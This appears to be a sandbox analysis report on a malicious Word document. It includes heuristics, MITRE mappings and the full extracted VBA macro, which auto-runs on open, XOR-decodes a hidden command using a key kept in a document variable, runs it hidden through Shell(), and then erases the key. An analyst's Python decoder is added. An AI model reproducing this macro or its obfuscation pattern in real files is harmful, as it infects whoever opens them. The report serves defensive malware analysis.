Verdict: MALICIOUS (Risk Score 162)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample contains a VBA macro whose Document_Open handler (in the ThisDocument module) runs automatically when the document is opened. On first run it calls DdvoqmBPRv in module XKXSCiJ, which decodes a 75-element integer array by XORing each element against a repeating key read from the Word document variable wYmdIG, then passes the decoded string to Shell() with window style 0 (vbHide), so the resulting process starts with no visible window. The decoded command is likely a downloader or other second-stage launcher, but it cannot be recovered from the macro source alone: the key is the variable's original value, which lives in the document data rather than in the VBA project and is not shown in this report. The macro also acts as its own tripwire. After the first execution it overwrites wYmdIG with "toto" and, unless the document is read-only, saves it, so later opens do nothing and a copy that has already been opened and saved no longer contains the key. Recover the original variable value from a pristine copy of the document before attempting decryption; "toto" is the post-execution marker, not the key.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Embedded URLs (all found in document text, OLE body):
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/tiff/1.0/
- http://schemas.openxmlformats.org/drawingml/2006/main

All three are XML namespace identifiers from embedded metadata (RDF/XMP and DrawingML); they are not referenced by the macro and are not network indicators.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1565 bytes | a1df33e2d30340f4a7ad994ed32978428d056d2e8b39d699f15a6cb71848a1f4 |

Preview (first 1,000 lines of the extracted script; the file holds two modules, ThisDocument and XKXSCiJ, one after the other):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wYmdIG").Value <> "toto" Then
DdvoqmBPRv
ActiveDocument.Variables("wYmdIG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "XKXSCiJ"
Private Function TTodQNRDxC(FCYyMCLAff As Variant, UwaDuZjwQY As Integer)
Dim TszWehbFFL, EaDLfqaOZz As String, mRkCLAVTkW, zPpIPKCPru
EaDLfqaOZz = ActiveDocument.Variables("wYmdIG").Value()
TszWehbFFL = ""
mRkCLAVTkW = 1
While mRkCLAVTkW < UBound(FCYyMCLAff) + 2
zPpIPKCPru = mRkCLAVTkW Mod Len(EaDLfqaOZz): If zPpIPKCPru = 0 Then zPpIPKCPru = Len(EaDLfqaOZz)
TszWehbFFL = TszWehbFFL + Chr(Asc(Mid(EaDLfqaOZz, zPpIPKCPru + UwaDuZjwQY, 1)) Xor CInt(FCYyMCLAff(mRkCLAVTkW - 1)))
mRkCLAVTkW = mRkCLAVTkW + 1
Wend
TTodQNRDxC = TszWehbFFL
End Function
Public Function DdvoqmBPRv() As Variant
Dim JXv As String
JXv = TTodQNRDxC(Array(4, 79, 55, 56, 36, 43, 80, 37, 38, 33, 11, 38, 1, 57, 62, 50, 44, 88, 84, 57, 30, _
74, 47, 28, 83, 104, 28, 60, 80, 74, 38, 71, 58, 34, 9, 108, 74, 90, 3, 58, 70, _
28, 30, 24, 28, 61, 28, 59, 29, 56, 8, 18, 66, 15, 37, 91, 17, 38, 18, 18, 94, _
3, 63, 53, 106, 4, 80, 80, 90, 90, 61, 27, 54, 5, 23), 0)
Dim RetVal
RetVal = Shell(JXv, 0)
End Function
```
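To decode the command offline once the original wYmdIG value has been recovered, the decoder TTodQNRDxC can be re-implemented outside Word. The Python below is an added example written for this report, not code from the sample or from the analysis tool. It mirrors the VBA semantics exactly (1-based counter, `Mod Len(key)` with 0 mapped to `Len(key)`, the `UwaDuZjwQY` offset, and VBA's runtime error when `Mid()` runs past the key), carries the 75 integers copied from the macro, and adds a known-plaintext helper for recovering key bytes from a guessed command prefix. The key `DEMO_KEY` and command `DEMO_CMD` are constructed for the round-trip demonstration and have nothing to do with the sample; the real key is not on this page.

```python
"""Re-implementation of the macro's XOR decoder (TTodQNRDxC) plus analyst helpers.
Added example for this report; not part of the sample or the analysis tool."""

# The 75 integers DdvoqmBPRv passes to TTodQNRDxC, copied from the extracted macro.
ENCODED = [
    4, 79, 55, 56, 36, 43, 80, 37, 38, 33, 11, 38, 1, 57, 62, 50, 44, 88, 84, 57, 30,
    74, 47, 28, 83, 104, 28, 60, 80, 74, 38, 71, 58, 34, 9, 108, 74, 90, 3, 58, 70,
    28, 30, 24, 28, 61, 28, 59, 29, 56, 8, 18, 66, 15, 37, 91, 17, 38, 18, 18, 94,
    3, 63, 53, 106, 4, 80, 80, 90, 90, 61, 27, 54, 5, 23,
]

# Value Document_Open writes into wYmdIG after the first run: the tripwire marker, not the key.
TRIPWIRE_VALUE = "toto"

# Constructed demo values (hypothetical, NOT recovered from the sample) for the round trip.
DEMO_KEY = "Xk9#pQ"
DEMO_CMD = 'cmd /c powershell -w hidden -c "Start-Sleep 1"'


def vba_xor_decode(encoded, key, offset=0):
    """Mirror TTodQNRDxC(FCYyMCLAff, UwaDuZjwQY).

    VBA walks the array with a 1-based counter i, selects key position
    (i Mod Len(key)) with 0 mapped to Len(key), adds `offset`, and XORs Asc() of
    that key character with the integer. Mid() outside 1..Len(key) yields "" and
    Asc("") raises VBA runtime error 5; that is reproduced here as ValueError.
    """
    if not key:
        raise ValueError("empty key: VBA fails on Mod 0 (division by zero)")
    out = []
    for i in range(1, len(encoded) + 1):
        pos = (i % len(key)) or len(key)  # 1-based; 0 means Len(key)
        pos += offset
        if pos < 1 or pos > len(key):
            raise ValueError("Mid() out of range: VBA raises runtime error 5 on Asc(\"\")")
        out.append(chr(ord(key[pos - 1]) ^ int(encoded[i - 1])))
    return "".join(out)


def vba_xor_encode(plaintext, key, offset=0):
    """Inverse of the decoder. XOR is symmetric, so encoding is the same walk on code points."""
    return [ord(c) for c in vba_xor_decode([ord(p) for p in plaintext], key, offset)]


def recover_key_fragment(encoded, guessed_prefix):
    """Known-plaintext step: with offset 0 the first Len(key) elements use key bytes 1..Len(key)
    in order, so if the command is guessed to start with `guessed_prefix` (e.g. "cmd" or
    "powershell"), key byte j is encoded[j] XOR prefix[j]. Returns the recovered characters."""
    return "".join(chr(e ^ ord(p)) for e, p in zip(encoded, guessed_prefix))


def looks_like_command(text):
    """Plausibility filter: a string handed to Shell() is printable ASCII, no control bytes."""
    return all(32 <= ord(c) < 127 for c in text)


if __name__ == "__main__":
    # The post-run marker is not the key: it produces control characters, not a command line.
    wrong = vba_xor_decode(ENCODED, TRIPWIRE_VALUE)
    print("decoded with 'toto':", repr(wrong), "plausible:", looks_like_command(wrong))
    # Round trip with the constructed demo key shows the decoder and the key-recovery step.
    blob = vba_xor_encode(DEMO_CMD, DEMO_KEY)
    print("round trip ok:", vba_xor_decode(blob, DEMO_KEY) == DEMO_CMD)
    print("key from guessed prefix:", recover_key_fragment(blob, DEMO_CMD[: len(DEMO_KEY)]))
```

Use `recover_key_fragment` on `ENCODED` with a guessed prefix only as a hypothesis generator: a fragment that yields a printable, repeating pattern is worth testing with `vba_xor_decode` and `looks_like_command`, but the authoritative key is the original wYmdIG value read from an unopened copy of the document.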